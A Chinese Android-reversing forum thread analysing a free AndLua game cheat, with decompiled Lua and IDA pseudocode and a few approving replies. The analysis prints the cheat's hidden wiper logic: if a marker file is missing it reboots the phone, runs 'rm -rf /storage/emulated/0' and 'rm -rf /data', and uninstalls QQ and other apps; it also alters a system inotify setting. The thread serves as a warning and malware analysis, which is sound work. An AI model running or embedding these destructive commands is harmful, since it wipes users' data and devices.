返回列表 发新帖

某AndLua辅助分析

[复制链接]

6

主题

579

帖子

1876

积分

高中生

Rank: 4

金币
1386
好评
10
贡献
0
发表于 2021-10-30 22:50:35 | 显示全部楼层 | 阅读模式
近来有空闲,就下了一款某游戏免费辅助分析,打发时间。
辅助是官方加密,解密基本烂大街了,这一步略过,我们重点分析main.lua文件。
  1. os.execute("mkdir /storage/emulated/0/Android/data/com.tencent.mobileqq/Tencent/QQfile_recv/")  -- 创建文件夹
  2. io.open("/storage/emulated/0/Android/data/com.tencent.mobileqq/Tencent/QQfile_recv/bh.txt", "w")  -- 创建bh.txt,根据后面二进制文件分析,bh.txt为重要验证文件
复制代码
main.lua启动后,先创建文件夹以及bh.txt文件作为游戏验证文件。接下来是进行网络开关配置,以及记录点击量(进行装逼?)
  1. Http.get("https://sharechain.qq.com/d778eba3fa20bdd363b84f95988e0948", function(A0_29, A1_30)  -- 网络开关配置
  2. ...
  3. -- 记录启动量
  4. Http.get("http://www.iyuji.cn/iyuji/s/a0NsM2U4SFV1WURNZ3BaSmNqTHZqZz09/1605429309623999", function(A0_31, A1_32)
复制代码
之后就是一些网络检测和v*p*n检测,我们关注以下它的启动功能
  1. -- 启动 BH/A1 下的文件,下同
  2. function A1.onClick()
  3.   if A1.checked then
  4.     ROOT = os.execute("su")
  5.     if ROOT == true then
  6.       os.execute("su")
  7.       _ENV["root执行"]("BH/A1", "开启成功")
  8.     else
  9.       _ENV["免root执行"]("BH/A1", "开启成功")
  10.     end
  11.   end
  12. end
复制代码

点击之后启动BH/A1文件,嗯,此为64位的可执行文件,也就是你们常说的二进制文件。
将A1文件拖入ida64,等反编译完成后定位到main函数,嗯。。。main函数一般都是可执行文件的启动函数。
  1. int __cdecl main(int argc, const char **argv, const char **envp)
  2. {
  3.   int v4; // [xsp+2Ch] [xbp+2Ch] BYREF
  4.   char *v5; // [xsp+30h] [xbp+30h]

  5.   if ( !fopen("/storage/emulated/0/Android/data/com.tencent.mobileqq/Tencent/QQfile_recv/bh.txt", "r") )   // 如果打开bh.txt失败,
  6.   {
  7.     rebootsystem();  // 重启手机
  8.     remove("/storage/emulated/0/Android");  // 删除SD卡下的Android文件夹,即app的数据目录
  9.     remove("/storage/emulated/0/iApp");  // 删除 SD卡下的 iApp 文件夹,暂未分析此文件夹用途
  10.     system("rm -rf /storage/emulated/0"); // 移除SD卡文件夹
  11.     system("rm -rf /data");  // 移除data文件夹,此辅助是root权限启动,理论是可以删除 data 文件夹的
  12.     uninstallapk("com.tencent.mobileqq");  // 卸载qq
  13.     uninstallapk("com.bairimeng.dmmdzz.m4399");  // 卸载软件
  14.     uninstallapk("com.aigz.cloudgame.cat");  // 卸载软件
  15.     printf(byte_6FA0);
  16.     exit(1);
  17.   }
  18.   killGG();  // 检测GG修改器,大体是遍历 /data/data/目录下的文件夹,与GG匹配
  19.   v5 = "com.bairimeng.dmmdzz.m4399";
  20.   BypassGameSafe(); //过检测?
复制代码


我们分析一下BypassGameSafe();
  1. __int64 BypassGameSafe(void)
  2. {
  3.   return system("echo 0 > /proc/sys/fs/inotify/max_user_watches");
  4. }
复制代码
就一个步骤,把0写入max_user_watches文件,修改系统文件,至于危害,不得而知。
总结,虽说此辅助属于免费,但是十几个可执行文件都加了格机代码,以及修改系统文件,稍有不慎,估计要重装手机系统了,当然,重装事小,要是手机里面有啥重要文件被格机那就搞笑了。




















来自群组: 安卓逆向分析破解
已有2人评分好评 金币 理由
yuanyxh + 1
正己 + 1 + 1 赞一个!

查看全部评分 总评分:好评 +2  金币 +1 

混子!混子!!混子!!!
回复

使用道具 举报

63

主题

2515

帖子

1万

积分

博士生

萌新

Rank: 7Rank: 7Rank: 7

金币
1938
好评
130
贡献
18

考神MT论坛帅哥MT论坛最佳新人MT论坛活跃会员

QQ
发表于 2021-10-30 23:01:08 | 显示全部楼层
本帖最后由 正己 于 2021-10-30 23:03 编辑

前排支持云哥,这格机就有点离谱了
最近建了个群,有兴趣的可以来吹吹牛【点击加群】
回复

使用道具 举报

27

主题

627

帖子

3315

积分

大学生

Rank: 5Rank: 5

金币
1546
好评
10
贡献
3
QQ
发表于 2021-10-30 23:16:17 来自手机  | 显示全部楼层
前排支持大佬
回复

使用道具 举报

19

主题

3785

帖子

1万

积分

博士生

Rank: 7Rank: 7Rank: 7

金币
1978
好评
22
贡献
0

MT论坛最佳新人考神MT论坛活跃会员

发表于 2021-10-30 23:17:42 来自手机  | 显示全部楼层
前排膜拜大佬
回复

使用道具 举报

13

主题

822

帖子

2480

积分

大学生

Rank: 5Rank: 5

金币
905
好评
2
贡献
0
QQ
发表于 2021-10-30 23:53:57 来自手机  | 显示全部楼层
感谢分享
回复

使用道具 举报

0

主题

3529

帖子

7151

积分

硕士生

Rank: 6Rank: 6

金币
2753
好评
0
贡献
0
发表于 2021-10-31 01:31:52 | 显示全部楼层
谢谢分享!
回复

使用道具 举报

0

主题

748

帖子

2052

积分

大学生

Rank: 5Rank: 5

金币
419
好评
0
贡献
0
发表于 2021-10-31 03:08:21 来自手机  | 显示全部楼层
糟老头子坏的很
回复

使用道具 举报

340

主题

3991

帖子

1万

积分

博士生

大佬

Rank: 7Rank: 7Rank: 7

金币
1319
好评
58
贡献
0

考神MT论坛最佳新人MT论坛帅哥MT论坛活跃会员MT论坛灌水老大MT论坛侠客MT论坛新人

发表于 2021-10-31 06:49:25 来自手机  | 显示全部楼层
看看看。
回复

使用道具 举报

70

主题

2530

帖子

6925

积分

硕士生

Rank: 6Rank: 6

金币
1636
好评
42
贡献
0

考神MT论坛新人MT论坛最佳新人MT论坛活跃会员

发表于 2021-10-31 10:15:01 来自手机  | 显示全部楼层
免费终归是要付点东西的
回复

使用道具 举报

0

主题

1582

帖子

2977

积分

大学生

Rank: 5Rank: 5

金币
693
好评
0
贡献
0

MT论坛最佳新人MT论坛新人考神

发表于 2021-10-31 12:57:24 来自手机  | 显示全部楼层
感谢分享
回复

使用道具 举报

发表回复

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表